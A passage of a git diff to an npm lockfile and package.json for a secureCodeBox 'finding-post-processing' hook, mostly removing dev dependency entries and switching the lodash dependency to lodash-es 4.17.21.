"leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lodash": { + "node_modules/lodash-es": { "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" - }, - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "requires": { - "yallist": "^3.0.2" - } - }, - "make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "requires": { - "semver": "^6.0.0" - } - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } - }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "requires": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - } - }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "requires": { - "path-key": "^3.0.0" - } - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "requires": { - "wrappy": "1" - } - }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "requires": { - "mimic-fn": "^2.1.0" - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - }, - "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - } - } - }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true - }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - } - }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true - }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - } - }, - "pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } - }, - "pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true - }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true - }, - "resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", - "dev": true, - "requires": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - } - }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - } - }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true - }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "requires": { - "escape-string-regexp": "^2.0.0" - } - }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, - "supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true - }, - "to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "requires": { - "is-number": "^7.0.0" - } - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - }, - "update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "requires": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - } - }, - "v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "requires": { - "isexe": "^2.0.0" - } - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==", + "license": "MIT" + } + }, + "dependencies": { + "lodash-es": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==" } } } diff --git a/hooks/finding-post-processing/hook/package.json b/hooks/finding-post-processing/hook/package.json index 4ca59f2fae..7b2dcbe7e9 100644 --- a/hooks/finding-post-processing/hook/package.json +++ b/hooks/finding-post-processing/hook/package.json @@ -32,10 +32,8 @@ }, "homepage": "https://www.secureCodeBox.io", "dependencies": { - "lodash": "^4.17.21" + "lodash-es": "^4.17.21" }, 